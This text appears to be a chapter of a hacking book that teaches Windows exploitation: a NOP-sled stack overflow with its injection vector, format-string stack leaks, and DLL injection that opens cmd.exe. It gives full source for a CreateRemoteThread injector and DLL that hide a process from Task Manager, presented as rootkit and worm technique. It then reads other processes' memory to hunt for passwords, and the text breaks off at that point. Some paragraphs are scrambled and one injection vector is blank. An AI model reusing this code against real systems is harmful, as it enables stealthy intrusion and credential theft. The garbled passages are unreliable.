Friends, initially we will try to inject a code that does not need to be compiled. This code is very easy and can be used to perform a DOS attack (Denial Of Service attack) or partially make the system crawl by consuming the CPU usage up to 100%, but with no other side effect or infection. The code is actually a NOP sled with a jump appended that lands back within the NOP sled, and thus the code will trap the processor in an endless loop. The opcode is:

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\xF8

The NOP sled is according to the size of the buffer (20 bytes in this case) and the end of the NOP sled is appended with a jump instruction, i.e. EB F8. In printable format we will supply this code in this form:

ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°

Now it's time to frame an ideal example:

/* newflow.cpp */
#include <iostream>
using namespace std;

void consfunc(void)
{
    system("PAUSE");
}

int main (int argc, char* argv[])
{
    char stringBuffer[20];
    cout << "Enter the string: ";
    cin.getline(stringBuffer, 30);

    consfunc();
    return EXIT_SUCCESS;
}

Don't confuse with the code: it is created for fun only, and roughly, in order to show you that even secure functions like getline can also be vulnerable if implemented carelessly (we'll try to break the boundary of array-index-limited functions like getline in the Modifying the Process Memory section). Compile this as:

C:\>CL /Gs newflow.cpp

Now open Visual C++ 6.0 and open the executable file for debugging. Set a breakpoint at the line cin.getline(stringBuffer, 30); by right-clicking on the line or from the Edit menu. Now from the Build menu click on Start Debug and then click Go. If needed press F10, and at the console, when ready, type the string "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" and press Enter. Check the memory window; it will contain "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". Just check out the address of the beginning of the above string. In our case we found it to be 0x0012FF6C. The same address will be contained by the ESP register. This very address is the address with which we need to fill the saved return address, or EIP.

Therefore, using this hack, the ASCII form of the opcode with the return address appended to it (12FF6C in reverse order is l ^R, or in decimal 6CFF12 == 108 255 18) becomes:

ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°l ^R

And this is the required injection vector. When we insert it when prompted, the program falls into an infinite loop:

C:\code>newflow
Enter the string: ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°l ^R
Press any key to continue . . .

Check it in the Task Manager window: the CPU performance will be 100%, and in the Processes tab the CPU column of the process named "newflow.exe" will show a consumption of 98 to 99.
With this example, we are now able to control the CPU and can run any custom code designed for a special purpose, or shellcode. Friends, try to do lots of practice, as much as you can, every time with a different program code.
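The injection vector used above — a sled of 0x90 bytes with a payload appended — can be sketched as a small builder. This helper is illustrative only (the name buildVector and the sizes are made up, not from the book):

```cpp
#include <vector>
#include <cstddef>

// Sketch of assembling an injection vector: a NOP sled (0x90 bytes)
// followed by payload bytes. In the example above the payload was the
// backward jump EB F8 plus the saved-return-address overwrite; here the
// payload is whatever byte sequence the caller supplies.
std::vector<unsigned char> buildVector(std::size_t sledLen,
                                       const std::vector<unsigned char> &payload)
{
    std::vector<unsigned char> v(sledLen, 0x90);       // the NOP sled
    v.insert(v.end(), payload.begin(), payload.end()); // append payload
    return v;
}
```

Building the vector this way makes the sled length an explicit parameter, which matters because it must match the distance between the start of the vulnerable buffer and the saved return address.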
Executing the Arbitrary Code

In this discussion we are going to learn some of the tricks to execute arbitrary code provided by us. In this attack the attacker shifts the execution onto the arbitrary machine code supplied by the attacker in a controlled buffer. The attacker initiates the software and puts his shellcode in the buffer provided for legitimate input from him. Then the memory block containing the shellcode is searched, the execution pointer is set on the first line of the shellcode, and the execution is continued again. The charm of this technique is that it does not need the software to have any memory leakage or overflow problems; even neatly written software pieces can also be attacked by this technique. But there is a problem: we need sufficient rights to debug the applications. The administrators have full privileges to debug the applications effectively in the NT environment.

Let's do it practically. The next program just takes input from the user and shows it on the screen.

/* arbcode.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    char userName[21];
    char passwd[21];
    char *userId = new char;
    char *pass = new char;

    userId = "vinnu";
    pass = "iAMsatisfied";

    cout << "Enter the userid: ";
    cin.getline (userName, 21);
    cout << "Enter the password: ";
    cin.getline (passwd, 21);

    if (strcmp(userName, userId) == 0)
    {
        if (strcmp (passwd, pass) == 0)
        {
            cout << "Login Successful." << endl;
        }
        else
        {
            cout << "Login Failed." << endl;
        }
    }
    else
    {
        cout << "Login Failed." << endl;
    }

    delete userId;
    delete pass;
    return EXIT_SUCCESS;
}

Compile the code and execute it as:

C:\access denied\code>arbcode
Enter the userid: vinnu
Enter the password: iAMsatisfied
Login Successful.

C:\access denied\code>arbcode
Enter the userid: iAMsatisfied
Enter the password: vinnu
Login Failed.

C:\access denied\code>arbcode
Enter the userid: vinnu
Enter the password: iAMsatisfiedA
Login Failed.

C:\access denied\code>arbcode
Enter the userid: as123æ
Enter the password: coinƒ
Login Failed.
C:\access denied\code>

The program works as desired. Now we want this program to execute whatever we provide it in the userId or password buffers. To do this, execute the program, and when asked to enter the userId pass it the string ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°. Do not press Enter yet.

C:\access denied\code>arbcode
Enter the userid: ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ°

Note: É is 0x90 in hex; to supply it in the buffer, switch on Numlock & press Alt+144 in the numeric keypad. This string is actually a NOP sled followed by the jump EB F8: 0xEB is Alt+235 and 0xF8 is Alt+248.

Now open the debugger and attach to the running process arbcode using the Build menu, Start Debug, and then Attach to Process. Now in the Edit menu select Goto and in the text box specify the address 0x0040107E. Scroll down the disassembled code in the debugger and look for the code pushing the addresses lying inside the .data section. Yes, we got a few. One is:

004010B8 68 C8 30 41 00       push 4130C8h

This instruction pushes the address of the string "Enter the userid:". But this code has already executed, so go on scrolling down. We found another & it is:

004010DA 68 DC 30 41 00       push 4130DCh
Right click on any of the NOP instruction and select the 140 . There is another effective method to find out the stack addresses. And press enter in the process arbcode. In Edit menu select Goto and insert this address as we did (Remember to select the disassembly section in debugger. we got our injected buffer values 90 90 90 90 … etc. so any of the NOP instruction can get the execution control first). Now check the value of ESP and put it in address area of memory box. In our case. the registers were holding the following values EAX = 00414D20 EBX = 7FFDE000 ECX = 0012FFB0 EDX = 00414D20 ESI = 00000000 EDI = 00000016 EIP = 004010DA ESP = 0012FF38 EBP = 0012FF80 EFL = 00000246 Just a little below the ESP address. Note the address of any of these values (our injected code is independent of first instruction execution bound. The debugger will get highlighted. We selected 0x0012FF71. Open the Call Stack window from ‘view->debug window’ & check out the addresses given in this window.This instruction pushes the address of the string “Enter the password:” Insert a breakpoint on this instruction as this instruction is yet to be executed (actually execution will be broken automatically after password prompting). nor the Goto will operate in memory box). Now we have the address of controlled buffer.
“Set Next Statement” and then press “Go” or F5 key. Check it out with task manager’s performance tab with 100% performance or in processes tab check for CPU column of arbcode. In this way we can do whatever we want to do. Summary: In this attack.text section in the code just after the code handling the string buffer and when the debugger is popped out. when the process itself runs on higher privileges and the user can trick it to do anything using the shellcode. the memory address of the string buffer is searched. the breakpoint is set on the memory location somewhere in the . And the arbitrary code will get the executional control. 141 . Once we got the location of the string buffer. Even the programs which are neat & clean from memory overflows or off by one can also be tricked to execute the desired code. we can transfer the execution on the code contained in the string buffer. The situation becomes bad from security point of view.
Hardening the Buffer Security

The arbitrary code execution attack makes most software vulnerable. To make the software sustain such an attack, we must take care of a few things:

1) Delete the buffer strings from memory as soon as possible.
2) While taking the input from a user-controlled buffer, we must add junk bytes after each character of the string. This leads to an undesired result if the string is ever executed, failing the execution and foiling the attack.
3) Transform the string into something else as soon as possible, so as to make it harder to find the string in memory, and to foil an attempt to execute it directly even if it is found.
4) Do not define the error messages or other screen messages related to the user input closely with the string-handling code in the program. Doing so lets the attacker land directly in the string-handling code in the executable file using error or message tracing methods.
5) Do not use the well-known methods to get the user input in the code.
6) Always use the limit-bounding string-handling functions like getline, snprintf, etc.

All these techniques are not enough to secure the software against such attacks, but they will make life somewhat harder for an attacker. Be creative and try to employ new techniques in different programs. Remember, in some places and in certain circumstances we may have to compromise and use some insecure techniques. Also remember that not all bugs are exploitable.
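The junk-byte idea from point 2 above can be sketched as follows. The helper name junkify is made up for illustration; the choice of junk byte is up to the implementer (0xCC, the int3 breakpoint opcode, is one option that would make an injected opcode stream trap immediately):

```cpp
#include <string>

// Sketch of hardening point 2: interleave a junk byte after every input
// character before the string is stored or processed further. If execution
// is ever redirected into this buffer, the interleaved bytes break up any
// opcode sequence the attacker smuggled in.
std::string junkify(const std::string &input, char junk)
{
    std::string out;
    out.reserve(input.size() * 2);
    for (std::string::size_type i = 0; i < input.size(); ++i)
    {
        out.push_back(input[i]);
        out.push_back(junk); // defaces any injected machine code
    }
    return out;
}
```

The legitimate logic must of course strip or skip the junk bytes when it compares or displays the string; the cost of that bookkeeping is the price of the hardening.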
Format String Attack

This attack is a result of the lack of understanding of security issues which arise due to bad programming habits or laziness of developers. The issue is related to a well-known formatting function in C & C++: printf. We have used this function many times in our preceding programs; printf is normally used to format the output and to display the results on the screen. But at this time we are going to discuss some of its extraordinary aspects. Well friends, printf() is a very interesting function: its number of arguments is not fixed, and its arguments show a large variety in their types. The format string character follows the '%' sign; format strings are used to format the variables as required. A simple usage of printf looks like this: suppose a = 1, b = 2, c = 3, then

printf ("a = %x, b = %x, c = %x\n", a, b, c);

will print it like:

a = 1, b = 2, c = 3

But suppose we remove the third variable from the printf format string arguments, i.e.:

printf ("a = %x, b = %x, c = %x\n", a, b);

In the above example we have just removed the variable c from the arguments list for the printf function, but we have intentionally kept its format string in the printf body. Let's use the above crafted function in an example:

/* formt.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    int a, b, c;
    a = 1;
    b = 2;
    c = 3;
    printf("a = %08x, b = %08x, c = %08x", a, b);
    return EXIT_SUCCESS;
}
The execution of the above program gives us:

a = 00000001, b = 00000002, c = 00000014

Hey! Look at the value c = 00000014 — where did it come from? Well, printf is too foolish to check that we haven't provided any variable for c's format specifier. It printed a memory location from the stack, where all its arguments are pushed before the call.

printf can also directly take a string variable for printing without any format string, i.e. printf(variable). Let's program it also:

/* fmats.cpp */
#include <iostream>
using namespace std;

void main(int argc, char* argv[])
{
    char *array;
    if (argc < 2){
        cout << "usage: fmats <string10>" << endl;
        exit(1);
    }
    array = argv[1];
    printf(array);
}

Let's execute it:

C:\Documents and Settings\vinnu\Develop>fmats
usage: fmats <string10>

C:\Documents and Settings\vinnu\Develop>fmats AAAAAAAA
AAAAAAAA

C:\Documents and Settings\vinnu\Develop>fmats AAAAAAAA%d
AAAAAAAA4263634

C:\Documents and Settings\vinnu\Develop>fmats AAAAAAAA%d%d
AAAAAAAA42636341245120

C:\Documents and Settings\vinnu\Develop>
Observe the output when the string was AAAAAAAA%d: the output was AAAAAAAA4263634. When we introduced a format specifier explicitly into the input string, the printf function responded to it and printed a number in its place. Well friends, as a programmer you may have learned that it is a garbage value. Yes it is — if you are just a programmer. But it is something called stack transparency if you are a hacker. Let's check the other format strings also:

C:\Documents and Settings\vinnu\Develop>fmats %08x,%08x,%08x,%08x,%08x,%08x
00410ed2,0012ffc0,00000006,00404a1f,00000001,00410e00

C:\Documents and Settings\vinnu\Develop>fmats %08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x
00410ea2,0012ffc0,00000012,00404a1f,00000002,00410e90,00000000,7ffdf000

The above output shows us the stack memory for the printf function. Now compile the same program in a Linux system as:
DLL Injection Attack

This attack plan solves the problem of a non-executable stack. Well friends, this attack plan is a modified version of the 'return to libc' attack on Linux systems. This attack needs a little deeper understanding of things.

Actually, the Windows kernel consists of two major layers:

1) DLL layer
2) VXD layer

The VXD layer is the virtual device driver layer, and the DLL layer contains the dynamically loaded libraries, which provide the precious API functions. The API functions are the way application software talks to the operating system or requests the appropriate services. The VXD layer is used by hackers, viruses & worms to raise the low privilege mode of any program from ring3 to ring0 in the NT environment, i.e. privileges equal to the system or the kernel itself. We will discuss the VXD layer and the methods to raise privileges in the next few topics.

The DLLs can be linked with any process space dynamically. Most of the system's DLLs are always loaded at a fixed address — like kernel32.dll, which is always loaded in every process at 0x7c800000, and ntdll.dll at 0x7c900000, in our case on Windows XP. (In Windows Vista the DLLs are always loaded at a random base address.) These base addresses can be changed using rebase.exe.

Enough on DLLs; let's come back to our attack plan. The attack needs an understanding of the addressing and argument-placing system in the stack memory of a process. Before a function call, the function arguments are placed in stack memory from right to left (for cdecl; otherwise it depends upon the calling convention). We mean the first argument at the rightmost place, then the second argument towards the left side, and the last argument at the leftmost corner. For clearance, check out the figure.
argn | arg(n-1) | arg(n-2) | … | arg2 | arg1    (toward the left in the stack)

Functions are called in a fixed way by the operating system; but suppose we force the processor to call functions from a list provided by us manually — then we have to pass the list in the same way the operating system does. In this attack, the function calls are chained along with their arguments. This kind of attack is used to chain the libc (C library) functions back to back on Linux. In the Windows operating system we can chain the DLL-exported functions. The first function that is desired to be executed is placed first, then the return address is placed, and then the last argument … first argument. Thus, the injection vector will be no more than a pile of addresses.

One more thing we have to cope with is that, by default, all compiled DLLs are loaded at 0x10000000 in process memory. Thus the address of our declared function will contain 0x00 at least once — as in 0x1000107E, where the two zeros shown in bold in the preceding address will cause the overflow string to terminate (strings are terminated where a NULL byte is encountered), and it will foil the hack. To eliminate such a problem we need to change the base address of the image of the DLL — we mean rebasing the DLL. We'll do it with the help of rebase.exe, which comes along with Visual Studio. We can also do it by manual surgery of the DLL with the help of a hex editor.

For simplicity, we'll declare a single function whose body will contain all the desired code for hacking, and then compile the program as a DLL. Then we will inject this newly created DLL into the vulnerable process space (DLLs have their own code section, therefore no problem of a non-executable stack, as the shellcode lies in the executable code section of the injected DLL) and then redirect the executional control to the injected library. As shown in the figure:
Func Addr. | Ret. Addr. | Last arg. | … | First Argument

If we have to call just a single function, then we need not specify any valid return address; we can place any address there. But in this case we need to call many functions, so we have to chain the function calls, and the functions' arguments are provided in the way listed in the figure:

F1 addr. | F2 addr. | F1 arguments | F2 arguments

But there is a problem yet to be tackled: in some places the stack clearing may cause a problem, as it may clear parts of the injection vector. Rather, we will place all the calls in a single exportable function in a DLL and inject this DLL into the vulnerable process's memory space.

The attack plan: the first function we will call here is "LoadLibraryA", exported from "kernel32.dll". Well, we need not load kernel32.dll, as it is loaded for each & every process by default. Let us code a suitable DLL file, inject.cpp, for our attack:

/* inject.cpp */
#include <iostream>
#include <process.h>

/* place any code to execute inside smackdown function. */
__declspec (dllexport) void smackdown(void)
{
    char *program, *argarray[3];
    program = "c:\\windows\\system32\\cmd.exe";
    argarray[0] = "cmd";
    argarray[1] = "START";
    argarray[2] = NULL;
    std::cout << "***Created by Xtremers***" << std::endl;
    execve(program, argarray, NULL);
}

Build the inject.cpp in Visual Studio and compile it using the following command:

C:\Access Denied\Code>CL /LD inject.cpp

It will create inject.dll in the same directory. Now we have the DLL file inject.dll containing the attacking function smackdown(). Let's check out the exports of inject.dll as:

C:\Access Denied\Code>Dumpbin /exports inject.dll

File Type: DLL
Section contains the following exports for inject.dll
           0 characteristics
    4657C0F4 time date stamp Sat May 26 10:39:08 2007
        0.00 version
           1 ordinal base
           1 number of functions
           1 number of names
    ordinal  hint  RVA       name
          1     0  0000107E  ?smackdown@@YAXXZ
Summary
        3000 .data
        2000 .rdata
        B000 .reloc
        2000 .text

The smackdown will be loaded at an offset 0000107E from the base address of inject.dll. Let's check out the headers of the DLL:
OPTIONAL HEADER VALUES
        1000 base of code
        C000 base of data
    10000000 image base

The above output shows that inject.dll will be loaded at 0x10000000, and smackdown() will be placed at

0x10000000 + 0x0000107E = 0x1000107E

But, as we discussed earlier, the address contains zeros forming a NULL byte in the string field. We must do something to eliminate these zeros to get rid of the null-byte problem. We can transform the base address 0x10000000 into 0x11110000 and eliminate the null byte. There are two ways. The first and safe way is to use rebase.exe as:

C:\Access Denied\code>rebase -R 0x10000000 -b 0x11110000 inject.dll
REBASE: Total Size of mapping 0x00020000
REBASE: Range 0x11110000 -0x11130000

In the second technique, open inject.dll in a hex editor and edit the hex values 0x00 0x10 at offsets 0x00000116 and 0x00000117 to 0x11 0x11; this will do the same.

Let's check the effect on inject.dll with dumpbin output:

OPTIONAL HEADER VALUES
    11110000 image base

The inject.dll will now be loaded at 0x11110000, and smackdown() will be located at

0x11110000 + 0x0000107E = 0x1111107E

— free from null bytes. Now we have the DLL prepared. We can inject inject.dll into the vulnerable process space using the LoadLibraryA function. But LoadLibraryA() needs the name of the library to be injected as its only argument and returns the pointer to the base
address of the loaded DLL in the EAX register. In Linux, the same technique is used to leverage privileges and open a shell by chaining the setuid() and execl() syscalls. Well friends, we will just inject the DLL and return to an address inside the recently injected DLL, as we already know the base address (and don't need the pointer returned in EAX). We are interested in opening an interactive command shell (actually we can do anything — opening network sockets, creating and hiding users, downloading any Trojan, executing any other process, etc. — but we choose this for example and for the sake of understanding and compactness). The vulnerable process in our case is the same earlier example, seconsol.exe.

The problem is: how do we provide the DLL name to be injected? There are a few places in process memory which can be used for this purpose. We can use any string buffer field or an environment variable. The environment is the best suited, we think. We can create any environment variable using the following command:

set <variable name>=<value>

and then execute the process from the same command console. We want to create an environment variable for inject.dll. Let's do it as:

C:\Access Denied\code>Set inj=inject.dll

Now we need the address of the environment variable. We can code a program utilizing the getenv() function for this purpose:

/* getenvaddr.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    char *ptr;
    if (argc < 2) {
        cout << "Usage: getenvaddr <environment variable name>" << endl;
        exit(1);
    }
    ptr = getenv(argv[1]);
    if (ptr == NULL)
        printf ("Environment variable %s does not exists.\n", argv[1]);
    else
        printf ("%s is located at %p\n", argv[1], ptr);
    return EXIT_SUCCESS;
}

Compile and execute the above program. But there is a problem: the getenvaddr program does not provide us the actual address of the variable in the vulnerable process; instead it returns the address of the environment variable in its own environment. In Windows systems, the environment addresses change offsets according to the process's own structure. The environment addresses depend upon the program names themselves: the larger the name, the nearer the environment variable will be located to the top of the stack; a smaller name means a little down the stack, at higher addresses (the stack grows down the memory). To find the actual address of inj we can debug, jump to the address provided by the getenvaddr program, and find the address of inject.dll — or try to search or manually browse the memory.

Now we have to create the injection vector. The structure of our injection vector contains the buffer string, the LoadLibraryA address overwriting the overflowed return address, a return address inside the loaded DLL, and then the argument for LoadLibraryA. We need not place any argument for the smackdown function, as we have declared it of void type for the sake of compactness and portability. Friends, you can read more about injection vectors in the next section.

First we need the LoadLibraryA address. We can also load any other system DLLs, but we have created inject.dll for the study purpose. Check out the exports listing for kernel32.dll and search for the following entry:
ordinal  hint  RVA       name
    578   241  00001D77  LoadLibraryA

We have the base address of kernel32.dll: it is 0x7C800000. Therefore:

0x7C800000 + 0x00001D77 = 0x7C801D77

0x7C801D77 will be the address of LoadLibraryA. The smackdown is at 0x1111107E and the environment variable inj is at 0x00420BAA. We have created the following injection vector for this purpose:

""

The bold hex dump in the middle is the address of LoadLibraryA in little-endian order, which will replace the overflowed return address, and the last bold hex dump is the address of inj as the argument for LoadLibraryA.

Note: Friends, we will be discussing more on developing exploits in the next section.

Let's create an exploit that will inject the injection vector into the vulnerable process seconsol.exe:

/* cinjector.cpp */
#include <iostream>
#include <process.h>
using namespace std;

int main (int argc, char* argv[])
{
    char *program, *argarray[3];
    program = "seconsol.exe";
    argarray[0] = "seconsol";
    argarray[1] = "";
    argarray[2] = NULL;
    execve(program, argarray, NULL);
    perror("execve");
    return EXIT_SUCCESS;
}

Let's check out its output as:

C:\access denied\code>cinjector

C:\access denied\code>Login failed.
***Created by Xtremers***
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\access denied\code>

Check out the line ***Created by Xtremers***. Friends, we successfully launched the attack.

Note: If an absolute path is not given, then LoadLibraryA will search for the DLL either in the same directory or in the windows or system32 directory.

There are other techniques for the DLL injection attack too; with them, we can inject any DLLs found on the system and force the system to do as desired. The most popular technique employs one process to force another process, using its process identifier, to load a DLL & execute some code from that DLL in the other process's address space. This technique is mostly used in cases where we have to leverage the privileges & some code needs ring0 privileges for its execution.
DLL Injection by CreateRemoteThread

Microsoft provides several API functions for controlling or affecting other processes from one process. One such API function is CreateRemoteThread; you can find it in the exports list of kernel32.dll. This function creates a thread which executes in the environment and virtual address space of another process.

HANDLE WINAPI CreateRemoteThread (
    __in  HANDLE hProcess,
    __in  LPSECURITY_ATTRIBUTES lpThreadAttributes,
    __in  SIZE_T dwStackSize,
    __in  LPTHREAD_START_ROUTINE lpStartAddress,
    __in  LPVOID lpParameter,
    __in  DWORD dwCreationFlags,
    __out LPDWORD lpThreadID
);

The function returns a handle to the new thread if it succeeds; otherwise, it returns a null value.

Parameters:

hProcess
A handle to the process in which the thread is to be created. The handle must have the PROCESS_ALL_ACCESS access right. We are going to create such a handle with the OpenProcess function.

lpThreadAttributes
A pointer to a SECURITY_ATTRIBUTES structure that specifies a security descriptor for the new thread. It specifies whether child processes can inherit the handle. If lpThreadAttributes is null, the thread gets a default security descriptor and the handle cannot be inherited.

dwStackSize
Defines the initial size of the stack in bytes. The system rounds this value to the nearest page. If zero, the new thread uses the default size for the executable.

lpStartAddress
A pointer to the application-defined function to be executed by the thread. It represents the starting address
of the thread in the remote process. The function must exist in the remote process.

lpParameter
The pointer to the argument passed to the thread function.

dwCreationFlags
The flags that control the creation of the thread. If this value is zero, the thread runs immediately after its creation. If CREATE_SUSPENDED is specified, the thread is created in a suspended state and does not run until the ResumeThread function is called.

lpThreadID
A pointer to a variable that receives the thread identifier. If this parameter is null, the thread identifier is not returned.

Note: CreateRemoteThread may also succeed if lpStartAddress points to a data section, or even if the code is not accessible. In such a situation an exception is thrown and the thread terminates.

The thread created by CreateRemoteThread has access to all objects that the process owns. Few processes have exclusive access to important objects and structures; other processes cannot access these objects at all. By creating a thread in such a remote process and executing code in the victim process's virtual address space and environment, we can obtain the desired results. This is the important aspect on which the attack is based most of the time.

The attack plan is like this: grab the process ID of the victim process, write the DLL's name into the victim process's memory space, and in the CreateRemoteThread function define the start routine as LoadLibraryA, providing it the pointer to the memory location of the DLL's name in the remote memory. The name of the DLL can be written in any variable, data input, or the environment. But still the problem is guessing the address of the location storing that name. This problem can be solved by using the VirtualAllocEx and WriteProcessMemory functions: we are going to write a block of memory in the victim process and so obviously get the pointer to the required memory location's address.
The process ID will be grabbed by the CreateToolhelp32Snapshot, Process32First, and Process32Next functions. In the earlier example we did everything manually — that was done to learn how the things can be managed by hand. In this example we are going to fully automate the DLL injection attack. Most worms and viruses use these techniques for their action; we'll catch them up in the Artificial Life section. The techniques used here will make you more powerful and will help you in the development of a lot of new concepts.

First of all we need to create the DLL. Open VC, create a "Win32 Dynamic-Link Library" project, name the project tHider, and write the following code into the tHider.cpp file:

/* tHider.cpp */
/* Description: Hides a process from task manager */
#include "stdafx.h"
#include <windows.h>
#include <commctrl.h>

DWORD WINAPI Injection(VOID)
{
    LVFINDINFO Find;
    int nItem;                       // item index
    // win handles
    HWND hTaskManager, hTaskDialog, hList;

    Find.flags = LVFI_STRING;
    Find.psz = "tInjector.exe";      // The process to hide
    while(TRUE)
    {
        Sleep(15);  // sleep will avoid the 100% resource utilization; loops grab the CPU
        // find taskmanager window
        hTaskManager = FindWindow(NULL, "Windows Task Manager");
        // Grab the handle to child window
        hTaskDialog = FindWindowEx(hTaskManager, NULL, "#32770", "Processes");
        hList = FindWindowEx(hTaskDialog, NULL, WC_LISTVIEW, NULL);
        // delete process tInjector.exe from Processes tab
        nItem = ListView_FindItem(hList, -1, &Find);
        ListView_DeleteItem(hList, nItem);
    }
    return FALSE;
}

BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if(ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        CreateThread(NULL, 0, (unsigned long (__stdcall *)(void *))Injection, 0, 0, NULL);
    }
    return TRUE;
}

This DLL will be injected into the task manager process and will grab and delete the tInjector.exe entry from the process list. The tInjector will find taskmgr.exe and will inject tHider.dll into it. Next is the code for tInjector:

/* tInjector.cpp */
#include <iostream>
#include <windows.h>
#include <TlHelp32.h>
#define DLLNAME "tHider.dll"
using namespace std;

// The function declarations.
HANDLE _cdecl processHunter(LPSTR szExeName);
bool dllInjector(HANDLE hProcess, LPSTR lpszDllPath);

int main (int argc, char* argv[])
{
    HANDLE hToken;
    HINSTANCE hInstance;
    HANDLE hProcess = NULL;
    TOKEN_PRIVILEGES tknp;

    // Grab the debug privilege so other processes can be opened.
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tknp.Privileges[0].Luid);
        tknp.PrivilegeCount = 1;
        tknp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, 0, &tknp, sizeof(tknp), NULL, NULL);
        CloseHandle(hToken);
    }

    // kernel32.dll is default loaded into all processes.
    hInstance = GetModuleHandle("Kernel32.dll");

    while(true)
    {
        if (FindWindow(0, "Windows Task Manager"))
        {
            hProcess = processHunter("taskmgr.exe");
            if (!hProcess)
            {
                CloseHandle(hProcess);
                hProcess = NULL;
            }
            else
            {
                dllInjector(hProcess, DLLNAME);
                CloseHandle(hProcess);
                hProcess = NULL;
            }
        }
        Sleep(20);    // Save precious cpu-cycles.
    }
    return EXIT_SUCCESS;
}

HANDLE _cdecl processHunter(LPSTR szExeName)
{
    PROCESSENTRY32 Pe = { sizeof(PROCESSENTRY32) };
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
    if (Process32First(hSnapshot, &Pe))
    {
        do
        {
            if (!strcmp(Pe.szExeFile, szExeName))
                return OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pe.th32ProcessID);
            Sleep(5);
        } while (Process32Next(hSnapshot, &Pe));
    }
    CloseHandle(hSnapshot);
    return NULL;
}

bool dllInjector(HANDLE hProcess, LPSTR lpszDllPath)
{
    DWORD dwWaitResult;
    HANDLE hThread = NULL;
    LPDWORD lpExitCode = 0;
    int ndllPathLen = lstrlen(lpszDllPath) + 1;   // string + 1 null byte.
    HMODULE hmKernel = GetModuleHandle("Kernel32");
    if (hmKernel == NULL || hProcess == NULL) return false;

    LPVOID lpvm = VirtualAllocEx(hProcess, NULL, ndllPathLen, MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, lpvm, lpszDllPath, ndllPathLen, NULL);
    hThread = CreateRemoteThread(hProcess, NULL, 0,
        (LPTHREAD_START_ROUTINE)GetProcAddress(hmKernel, "LoadLibraryA"),
        lpvm, 0, NULL);
    if (hThread != NULL)
    {
        // The process might not terminate before proper DLL injection (delay of 10 seconds).
        dwWaitResult = WaitForSingleObject(hThread, 10000);
        CloseHandle(hThread);
    }
    // Free the memory to avoid the memory leak.
    VirtualFreeEx(hProcess, lpvm, ndllPathLen, MEM_RELEASE);
    return true;
}

Keep in mind: either specify the absolute path of tHider.dll in DLLNAME, or copy tHider.dll into the windows\system32 directory. Execute tInjector.exe and start task manager by right-clicking on the taskbar or from the start menu; click the Processes tab and search for tInjector.exe. Not found at all! The list will be flickering — this is because every time the task manager process list refreshes, tHider.dll has to search for tInjector.exe and delete its entry. With this the DLL injection attack is complete, and now you have the power to manipulate any process as you want.

Think of it: instead of placing a huge number of rootkit tools into a victim system, just place one DLL that will search for several processes altogether and transform them all into Trojan processes — just place code which checks the process name and executes the appropriate functions for that very process. Wow!!! A single DLL can turn the whole thing around. It is true. We will do this in a worm in the Artificial Life section.
Reading Remote Process Memory

The process memory contains all the juicy information hackers are preying upon. The remote process memory can be read or copied to a disk file by a DLL injection attack — by forcibly creating a thread in the remote process environment — but the process is somewhat tedious. Microsoft has provided a simple solution for it. The ReadProcessMemory function,

ordinal 679  hint 2A6  RVA 00001B50  name ReadProcessMemory

exported by kernel32.dll, is the shortcut way to read the memory allocated to remote processes. This function needs a process handle returned by OpenProcess. The function as documented by Microsoft is:

BOOL ReadProcessMemory(
    HANDLE hProcess,
    LPCVOID lpBaseAddress,
    LPVOID lpBuffer,
    DWORD nSize,
    LPDWORD lpNumberOfBytesRead
);

Before the data transfer occurs, the system verifies that all data at the base address and memory of the specified size is accessible for read access. If so, the function proceeds; otherwise, the function fails.

hProcess
Handle to the process whose memory is being read.

lpBaseAddress
Pointer to the base address in the specified process to be read.

lpBuffer
Pointer to a buffer that receives the contents from the address space of the specified process.
nSize
Specifies the requested number of bytes to read from the specified process.

lpNumberOfBytesRead
Pointer to the number of bytes transferred into the specified buffer. If lpNumberOfBytesRead is NULL, the parameter is ignored.

Return Value
Nonzero indicates success; zero indicates failure.

Now, let's use this function in code:

/* memread.cpp */
#include <iostream>
#include <windows.h>
using namespace std;

int main (int argc, char* argv[])
{
    FILE *fp;
    int pid;
    char buffer[4097];
    char *memPointer;
    int bSize = 4096;

    cout << "Enter the PID: ";
    cin >> pid;
    HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    memPointer = (char *)0x0012FA00;
    fp = fopen("memread.txt", "a");
    cout << "Status: .......";
    if (!ReadProcessMemory(h, memPointer, buffer, bSize, 0))
        cout << "...failed..." << endl;
    else
        cout << "...success..." << endl;
    for(int i = 0; i < bSize; i++)
        fputc(((char *)buffer)[i], fp);
    fclose(fp);
    CloseHandle(h);
    return EXIT_SUCCESS;
}

Compile the above code as:

CL /Gs memread.cpp

Before executing this program you need the process ID of the remote process whose memory we want to access. The process ID of any process can be retrieved with the TASKLIST command. Then execute the program. The execution of memread creates a text file named memread.txt in the same folder. Open memread.txt in a hex editor and check out the contents of the memory.

Let us move on to the next, more flexible example. We have modified the memread.cpp program to search for strings or passwords in remote process memory. The program accesses the remote process memory and searches for the string using the strstr function. The source code is shown below:

/* passfinder.cpp */
#include <iostream>
#include <windows.h>
#define SIZE 4096
using namespace std;

int main (int argc, char* argv[])
{
